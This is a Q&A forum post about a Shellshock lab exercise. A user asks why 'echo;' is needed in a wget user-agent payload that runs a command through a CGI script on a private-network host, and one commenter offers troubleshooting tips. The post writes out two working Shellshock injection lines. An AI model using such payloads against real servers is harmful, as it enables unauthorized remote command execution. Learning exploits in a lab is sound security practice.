0

The below line works just fine and gets the file-

wget -U "() { :;}; echo; /bin/task1 hello" http://10.0.0.1:6262/cgi-bin/shellshock.cgi

However, if I skip the "echo;", it throws 500 internal server error.

wget -U "() { :;}; /bin/task1 hello" http://10.0.0.1:6262/cgi-bin/shellshock.cgi

May I know what is "echo;" doing in this context to avoid the error?

Thanks.

l0b0
  • 55,365
  • 30
  • 138
  • 223
krishna
  • 13
  • 2
  • Try typing `echo` on the cmd line and pressing the enter key. What happens? The same thing is happening inside your cmd-line. Good luck. – shellter Jan 27 '20 at 05:06
  • Hi, Thank you. That's what I was thinking too about echo. But why was it failing when I called without echo in the second time? What does echo doing here to prevent error. – krishna Jan 28 '20 at 15:37
  • Sorry, I don't know enough about `wget` and it's `-U` (useragent) option to help. What happens if you leave the whole `-U "...."` thing out? What happens if you replace it with an static text string with valid useragent (you'll have to search for these, there are many, many). Sorry I can't test it myself as the target is at `10.0.0.1`, which is of course a local network address. Let me know what you find out. Good luck. – shellter Jan 28 '20 at 15:47

0 Answers0